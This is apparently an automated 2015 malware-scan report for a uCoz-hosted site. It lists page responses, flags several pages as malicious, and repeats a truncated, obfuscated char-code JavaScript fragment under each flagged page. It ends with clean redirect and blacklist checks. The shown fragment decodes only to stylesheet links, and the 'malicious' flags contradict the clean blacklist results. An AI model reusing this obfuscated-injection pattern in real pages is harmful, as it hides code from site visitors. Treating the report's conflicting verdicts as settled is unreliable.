Scanned pages/files
Request | Server response | Status |
http://hellscream.ucoz.ua/ | 200 OK Content-Length: 46723 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var temp="",i,c=0,out=""; var str="60!108!105!110!107!32!104!114!101!102!61!34!47!115!116!121!108!101!47!109!97!105!110!46!99!115!115!34!32!116!121!112!101!61!34!116!101!120!116!47!99!115!115!34!32!114!101!108!61!34!115!116!121!108!101!115!104!101!101!116!34!47!62!13!10!60!108!105!110!107!32!104!114!101!102!61!34!47!115!116!121!108!101!47!104!105!103!104!115!108!105!100!101!46!99!115!115!34!32!116!121!112!101!61!34!116!101!120!116!47!99!115!115!34!32!114!101!108!61!34!115!116!121!108!101!115!104 Antivirus reports:
| ||
http://s25.ucoz.net/src/jquery-1.7.2.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://s25.ucoz.net/src/ulightbox/ulightbox.js | 200 OK Content-Length: 22097 Content-Type: text/javascript | clean |
http://s25.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228554 Content-Type: text/javascript | clean |
http://hellscream.ucoz.ua/js/dropdowncontent.js | 200 OK Content-Length: 5536 Content-Type: text/javascript | clean |
http://hellscream.ucoz.ua/forum/ | 200 OK Content-Length: 29441 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var temp="",i,c=0,out=""; var str="60!108!105!110!107!32!104!114!101!102!61!34!47!115!116!121!108!101!47!109!97!105!110!46!99!115!115!34!32!116!121!112!101!61!34!116!101!120!116!47!99!115!115!34!32!114!101!108!61!34!115!116!121!108!101!115!104!101!101!116!34!47!62!13!10!60!108!105!110!107!32!104!114!101!102!61!34!47!115!116!121!108!101!47!104!105!103!104!115!108!105!100!101!46!99!115!115!34!32!116!121!112!101!61!34!116!101!120!116!47!99!115!115!34!32!114!101!108!61!34!115!116!121!108!101!115!104 Antivirus reports:
| ||
http://hellscream.ucoz.ua/forum/7/ | 200 OK Content-Length: 34324 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var temp="",i,c=0,out=""; var str="60!108!105!110!107!32!104!114!101!102!61!34!47!115!116!121!108!101!47!109!97!105!110!46!99!115!115!34!32!116!121!112!101!61!34!116!101!120!116!47!99!115!115!34!32!114!101!108!61!34!115!116!121!108!101!115!104!101!101!116!34!47!62!13!10!60!108!105!110!107!32!104!114!101!102!61!34!47!115!116!121!108!101!47!104!105!103!104!115!108!105!100!101!46!99!115!115!34!32!116!121!112!101!61!34!116!101!120!116!47!99!115!115!34!32!114!101!108!61!34!115!116!121!108!101!115!104 Antivirus reports:
| ||
http://hellscream.ucoz.ua/load/ | 200 OK Content-Length: 38239 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var temp="",i,c=0,out=""; var str="60!108!105!110!107!32!104!114!101!102!61!34!47!115!116!121!108!101!47!109!97!105!110!46!99!115!115!34!32!116!121!112!101!61!34!116!101!120!116!47!99!115!115!34!32!114!101!108!61!34!115!116!121!108!101!115!104!101!101!116!34!47!62!13!10!60!108!105!110!107!32!104!114!101!102!61!34!47!115!116!121!108!101!47!104!105!103!104!115!108!105!100!101!46!99!115!115!34!32!116!121!112!101!61!34!116!101!120!116!47!99!115!115!34!32!114!101!108!61!34!115!116!121!108!101!115!104 Antivirus reports:
| ||
http://hellscream.ucoz.ua/photo/ | 200 OK Content-Length: 52180 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var temp="",i,c=0,out=""; var str="60!108!105!110!107!32!104!114!101!102!61!34!47!115!116!121!108!101!47!109!97!105!110!46!99!115!115!34!32!116!121!112!101!61!34!116!101!120!116!47!99!115!115!34!32!114!101!108!61!34!115!116!121!108!101!115!104!101!101!116!34!47!62!13!10!60!108!105!110!107!32!104!114!101!102!61!34!47!115!116!121!108!101!47!104!105!103!104!115!108!105!100!101!46!99!115!115!34!32!116!121!112!101!61!34!116!101!120!116!47!99!115!115!34!32!114!101!108!61!34!115!116!121!108!101!115!104 Antivirus reports:
| ||
http://s25.ucoz.net/src/photopage.js | 200 OK Content-Length: 18520 Content-Type: text/javascript | clean |
http://s25.ucoz.net/src/entriesList.js | 200 OK Content-Length: 639 Content-Type: text/javascript | clean |
http://hellscream.ucoz.ua/index/3 | HTTP/1.1 302 Found Cache-Control: private Connection: close Date: Sun, 19 Jul 2015 23:56:16 GMT Location: http://hellscream.ucoz.ua/register Server: uServ/3.2.2 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: ahellscreamuCoz=; path=/; expires=Fri, 19-Jul-2013 23:56:16 GMT; domain=.hellscream.ucoz.ua; | clean |
http://hellscream.ucoz.ua/register | 200 OK Content-Length: 29583 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var temp="",i,c=0,out=""; var str="60!108!105!110!107!32!104!114!101!102!61!34!47!115!116!121!108!101!47!109!97!105!110!46!99!115!115!34!32!116!121!112!101!61!34!116!101!120!116!47!99!115!115!34!32!114!101!108!61!34!115!116!121!108!101!115!104!101!101!116!34!47!62!13!10!60!108!105!110!107!32!104!114!101!102!61!34!47!115!116!121!108!101!47!104!105!103!104!115!108!105!100!101!46!99!115!115!34!32!116!121!112!101!61!34!116!101!120!116!47!99!115!115!34!32!114!101!108!61!34!115!116!121!108!101!115!104 Antivirus reports:
| ||
http://hellscream.ucoz.ua/panel/?a=ustat;u=hellscream;d=a;il=ru | HTTP/1.1 302 Found Connection: close Date: Sun, 19 Jul 2015 23:56:16 GMT Location: http://hellscream.ucoz.ua/panel/?a=ustat;u=hellscream;d=a;il=ru&sdc=1 Server: uServ/3.2.2 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: ahellscreamuCozso=0; path=/panel/; expires=Sun, 19-Jul-2015 23:56:16 GMT; domain=hellscream.ucoz.ua; Set-Cookie: ahellscreamlng=ru; path=/; expires=Mon, 18-Jul-2016 23:56:17 GMT; Set-Cookie: ahellscreamuzdc=1; path=/ | clean |
http://hellscream.ucoz.ua/panel/?a=ustat;u=hellscream;d=a;il=ru&sdc=1 | 200 OK Content-Length: 771 Content-Type: text/html | clean |
http://hellscream.ucoz.ua/test404page.js | 404 Not Found Content-Length: 6869 Content-Type: text/html | clean |
http://hellscream.ucoz.ua/index/ | HTTP/1.1 301 Moved Permanently Cache-Control: private Connection: close Date: Sun, 19 Jul 2015 23:56:17 GMT Location: http://hellscream.ucoz.ua/ Server: uServ/3.2.2 Content-Type: application/octet-stream Set-Cookie: ahellscreamuCoz=; path=/; expires=Fri, 19-Jul-2013 23:56:17 GMT; domain=.hellscream.ucoz.ua; | clean |
http://hellscream.ucoz.ua/photo/?page2 | 200 OK Content-Length: 31016 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var temp="",i,c=0,out=""; var str="60!108!105!110!107!32!104!114!101!102!61!34!47!115!116!121!108!101!47!109!97!105!110!46!99!115!115!34!32!116!121!112!101!61!34!116!101!120!116!47!99!115!115!34!32!114!101!108!61!34!115!116!121!108!101!115!104!101!101!116!34!47!62!13!10!60!108!105!110!107!32!104!114!101!102!61!34!47!115!116!121!108!101!47!104!105!103!104!115!108!105!100!101!46!99!115!115!34!32!116!121!112!101!61!34!116!101!120!116!47!99!115!115!34!32!114!101!108!61!34!115!116!121!108!101!115!104 Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hellscream.ucoz.ua
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Jul 2015 23:56:11 GMT
Server: uServ/3.2.2
Content-Length: 46723
Content-Type: text/html; charset=UTF-8
...46723 bytes of data.
GET / HTTP/1.1
Host: hellscream.ucoz.ua
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Jul 2015 23:56:11 GMT
Server: uServ/3.2.2
Content-Length: 46723
Content-Type: text/html; charset=UTF-8
...46723 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: hellscream.ucoz.ua
Referer: http://www.google.com/search?q=hellscream.ucoz.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: hellscream.ucoz.ua
Referer: http://www.google.com/search?q=hellscream.ucoz.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hellscream.ucoz.ua
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://hellscream.ucoz.ua/
Result: hellscream.ucoz.ua is not infected or malware details are not published yet.
Result: hellscream.ucoz.ua is not infected or malware details are not published yet.